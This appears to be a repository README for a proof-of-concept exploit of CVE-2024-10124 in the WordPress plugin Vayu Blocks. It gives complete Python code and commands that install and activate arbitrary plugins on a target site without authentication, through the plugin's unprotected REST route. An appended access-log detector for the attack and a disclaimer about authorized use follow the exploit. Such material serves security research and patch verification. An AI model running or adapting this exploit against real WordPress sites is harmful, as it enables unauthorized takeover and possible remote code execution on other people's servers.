# Vayu Blocks Exploit Tool

This is a proof-of-concept (PoC) tool for a security vulnerability (CVE-2024-10124) in the WordPress plugin Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce. The vulnerability stems from a missing capability check on the `tp_install()` function in versions up to and including 1.1.1, which allows unauthenticated attackers to install and activate arbitrary plugins, potentially leading to remote code execution.
## Features

- Unauthenticated plugin installation: exploits the vulnerability to install and activate a chosen plugin on the target WordPress site; by default it installs the hello-dolly plugin.
- Flexible parameter configuration: the target URL, the plugin name and whether to run only the version check can all be set through command-line arguments.
- Clear execution feedback: prints the response status code and response body so the result of the operation can be verified.
## Installation

### Requirements

- Python 3.x
- The `requests` library

### Steps

1. Clone or download this tool:

   ```
   git clone https://github.com/your-repo/CVE-2024-10124-Poc.git
   cd CVE-2024-10124-Poc
   ```

2. Install the Python dependency:

   ```
   pip install requests
   ```
## Usage

### Basic command format

```
python CVE-2024-10124.py -u <target URL> [options]
```

### Examples

1. Check whether the target site is vulnerable

   ```
   python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version
   ```

   This command reads the version of the Vayu Blocks plugin and reports whether it is a vulnerable version.

2. Install the default plugin (hello-dolly)

   ```
   python CVE-2024-10124.py -u http://192.168.100.74/wordpress
   ```

   Installs and activates the hello-dolly plugin on the target site.

3. Install a plugin by name

   ```
   python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p custom-plugin-name
   ```

   Installs the plugin named custom-plugin-name on the target site.
### Command-line arguments

| Argument | Description | Example |
|---|---|---|
| `-u`, `--url` | URL of the target WordPress site (must include the scheme) | `-u http://example.com/wordpress` |
| `-p`, `--plugin` | Name of the plugin to install; defaults to hello-dolly | `-p akismet` |
| `--check-version` | Only check the plugin version; do not perform the installation | `--check-version` |
| `-h`, `--help` | Show the help message | `-h` |
## Example output

```
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"
```
## Core code

The script imports `argparse`, `re`, `time` and `requests` at the top; the three excerpts below make up the rest of it.

### Version check

```python
import argparse
import re
import time

import requests


def check_version(url):
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("URL must start with http:// or https://")
    # The plugin's readme.txt carries the "Stable tag:" line; this path is assumed
    # from the standard WordPress plugin layout and may need adjusting.
    url_version = f"{url}/wp-content/plugins/vayu-blocks/readme.txt"
    try:
        response = requests.get(url_version, timeout=10)
        response.raise_for_status()
        if "Stable tag:" in response.text:
            stable_tag = response.text.split("Stable tag:")[1].split()[0].strip()
            # Compare the version as numeric components rather than as a string.
            version = tuple(int(part) for part in re.findall(r"\d+", stable_tag))
            if version <= (1, 1, 1):
                print(f"The site is vulnerable. Current version: {stable_tag}")
            else:
                print(f"The site is not vulnerable. Current version: {stable_tag}")
        else:
            print("Could not determine the plugin version: no 'Stable tag:' line in readme.txt")
    except requests.exceptions.RequestException as e:
        print("An error occurred while checking version:", e)
```

### Unauthenticated plugin installation

```python
def install_plugin(url, plugin_name):
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("URL must start with http:// or https://")
    if not plugin_name:
        raise ValueError("Plugin name cannot be empty")
    # REST route registered by the plugin without a permission check
    full_url = f"{url}/wp-json/ai/v1/vayu-site-builder"
    payload = {
        "params": {
            "plugin": {
                plugin_name: plugin_name.replace(" ", "-")
            },
            "allPlugins": [
                {
                    plugin_name: f"{plugin_name}/{plugin_name}.php"
                }
            ],
            "themeSlug": "",
            "proThemePlugin": "",
            "templateType": "free",
            "tmplFreePro": "plugin"
        }
    }
    headers = {
        "Content-Type": "application/json"
    }
    try:
        time.sleep(3)
        response = requests.post(full_url, headers=headers, json=payload, timeout=10)
        response.raise_for_status()
        if response.status_code == 200:
            print("Response Status Code:", response.status_code)
            print("The plugin has been successfully uploaded and activated.")
            print("Response Content:", response.json())
        else:
            print("Unexpected status code:", response.status_code)
            print("Response Content:", response.text)
    except requests.exceptions.RequestException as e:
        print("An error occurred while installing plugin:", e)
```

### Entry point and argument parsing

```python
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description=(
            "The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is "
            "vulnerable to unauthorized arbitrary plugin installation and activation due to a missing "
            "capability check on the tp_install() function in all versions up to, and including, 1.1.1. "
            "This makes it possible for unauthenticated attackers to install and activate arbitrary "
            "plugins which can be leveraged to achieve remote code execution if another vulnerable "
            "plugin is installed and activated. This vulnerability was partially patched in version 1.1.1."
        )
    )
    parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., http://192.168.100.74/wordpress)")
    parser.add_argument("-p", "--plugin", default="hello-dolly", help="Plugin name (default: hello-dolly)")
    parser.add_argument("--check-version", action="store_true", help="Check if the site is vulnerable based on plugin version")
    args = parser.parse_args()
    if args.check_version:
        check_version(args.url)
    else:
        install_plugin(args.url, args.plugin)
```
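Because the PoC posts to one fixed REST route, exploitation attempts leave a recognisable trace in web server access logs. The following detection example is added here and is not part of the PoC repository: it parses combined-format access log lines (constructed samples, with RFC 5737 documentation addresses) and reports every POST to that route, including the `?rest_route=` form WordPress accepts when pretty permalinks are disabled.

```python
import re
from urllib.parse import parse_qs, urlparse

# REST route the PoC above posts to; WordPress also serves it via ?rest_route=
ROUTE = "/ai/v1/vayu-site-builder"

# Apache/nginx "combined" access-log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def rest_path(target):
    """Route addressed by a request target: /wp-json/<route> or ?rest_route=<route>."""
    parsed = urlparse(target)
    route = parse_qs(parsed.query).get("rest_route")
    return route[0] if route else parsed.path

def find_exploit_attempts(lines):
    """One finding per POST to the vulnerable route; 'succeeded' marks a 200 reply."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rest_path(rec["target"]).rstrip("/").endswith(ROUTE):
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "status": int(rec["status"]),
                             "succeeded": rec["status"] == "200", "ua": rec["ua"]})
    return findings

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2025:10:00:01 +0000] "GET /wordpress/wp-json/ HTTP/1.1" 200 5120 "-" "python-requests/2.32.3"',
    '192.0.2.10 - - [01/Mar/2025:10:00:05 +0000] "POST /wordpress/wp-json/ai/v1/vayu-site-builder HTTP/1.1" 200 42 "-" "python-requests/2.32.3"',
    '198.51.100.7 - - [01/Mar/2025:10:01:00 +0000] "POST /wordpress/?rest_route=%2Fai%2Fv1%2Fvayu-site-builder HTTP/1.1" 401 95 "-" "curl/8.4.0"',
    '203.0.113.5 - - [01/Mar/2025:10:02:00 +0000] "POST /wordpress/wp-json/wp/v2/posts HTTP/1.1" 201 800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_exploit_attempts(SAMPLE_LOG):
        print(finding)
```

A 200 on this route from an unauthenticated client is the signal that the install actually went through and the site's plugin list should be reviewed.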
## Notes

- This tool is intended only for educational and security research purposes; use it only in authorized environments.
- Misuse of this tool to carry out unauthorized attacks will incur the corresponding legal liability.